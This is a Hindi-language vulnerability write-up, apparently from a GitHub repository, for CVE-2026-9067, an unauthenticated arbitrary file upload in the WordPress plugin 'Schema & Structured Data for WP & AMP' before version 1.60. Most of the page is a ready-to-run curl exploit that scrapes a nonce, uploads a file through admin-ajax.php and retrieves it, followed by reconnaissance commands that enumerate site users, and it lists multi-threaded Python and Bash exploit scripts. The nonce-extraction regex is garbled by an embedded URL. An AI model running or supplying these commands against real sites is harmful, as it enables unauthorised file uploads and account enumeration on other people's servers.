
WP और AMP के लिए स्कीमा और संरचित डेटा < 1.60 - अप्रमाणित मनमाना मीडिया अपलोड [POC और Xploit]
| CVE आईडी | प्लगइन | गंभीरता | प्रकार | स्थिति |
|---|
| CVE-2026-9067 | Schema & Structured Data for WP & AMP | उच्च (8.1) | अप्रतिबंधित फ़ाइल अपलोड | दस्तावेज़ीकृत |
| क्षेत्र | मान |
|---|---|
| CVE आईडी | CVE-2026-9067 |
| प्लगइन | Schema & Structured Data for WP & AMP |
| प्रभावित संस्करण | < 1.60 |
| CWE | CWE-434 (खतरनाक प्रकार के साथ फ़ाइल का अप्रतिबंधित अपलोड) |
| CVSS v3.1 | 8.1 (उच्च) |
| खोजकर्ता | 0xBassia |
प्लगइन Schema & Structured Data for WP & AMP संस्करण 1.60 से पहले फ़ाइल अपलोड के लिए AJAX हैंडलर पर उपयोगकर्ता क्षमता को मान्य नहीं करता है और अपलोड की गई फ़ाइल के प्रकार को मान्य नहीं करता है। यह गैर-प्रमाणित हमलावर को मनमानी फ़ाइल अपलोड करने की अनुमति देता है।
महत्वपूर्ण नोट: WordPress कोर निष्पादन योग्य फ़ाइलों (.php, .phtml, .html, .svg) को ब्लॉक करता है, इसलिए इस कमजोरी से कोई सीधा RCE पथ नहीं है।
CVE-2026-9067/
├── CVE-2026-9067.md # पूर्ण दस्तावेज़ीकरण (यह फ़ाइल)
├── CVE-2026-9067.py # मल्टी-थ्रेडिंग के साथ Python शोषण
├── CVE-2026-9067.sh # Bash/Shell PoC स्क्रिप्ट
└── CVE-2026-9067_exploit.sh # वैकल्पिक Bash PoC
# Step 1: Get nonce
NONCE=$(curl -s "https://yorbit7.ddev.site/" | grep -oP 'saswp_rf_(page_)?security_nonce["\x27]?\s*:\s*["\'](https://github.com/polosss/by-poloss..-..cve-2026-9067/blob/main/%5Ba-f0-9%5D%7B10%7D)["\']' | grep -oP '[a-f0-9]{10}' | head -1)
# Step 2: Upload arbitrary file
curl -X POST 'https://yorbit7.ddev.site/wp-admin/admin-ajax.php' \
-F 'action=saswp_rf_form_image_upload' \
-F "saswp_rf_form_nonce=$NONCE" \
-F '[email protected];type=image/png;filename=evil.csv'
# Step 3: Access uploaded file
curl -s "https://yorbit7.ddev.site/wp-content/uploads/$(date +%Y)/$(date +%m)/evil.csv"
| क्षेत्र | मान |
|---|---|
| लक्ष्य URL | https://yorbit7.ddev.site |
| PHP संस्करण | 8.4 |
| डेटाबेस | MariaDB 11.8 |
| WordPress संस्करण | 7.0 |
| परीक्षण विधि | curl-आधारित (ब्लैक-बॉक्स परीक्षण) |
curl -s -o /dev/null -w "%{http_code}" https://yorbit7.ddev.site
curl -s https://yorbit7.ddev.site/wp-content/plugins/schema-and-structured-data-for-wp/readme.txt | grep -i "Stable tag:"
curl -s https://yorbit7.ddev.site/wp-json/wp/v2/users | jq '.[] | {id, name, slug}'
DISALLOW_FILE_MODIFICATIONS स्थिरांक सेट करें.htaccess के माध्यम से अपलोड निर्देशिका में PHP निष्पादन अक्षम करें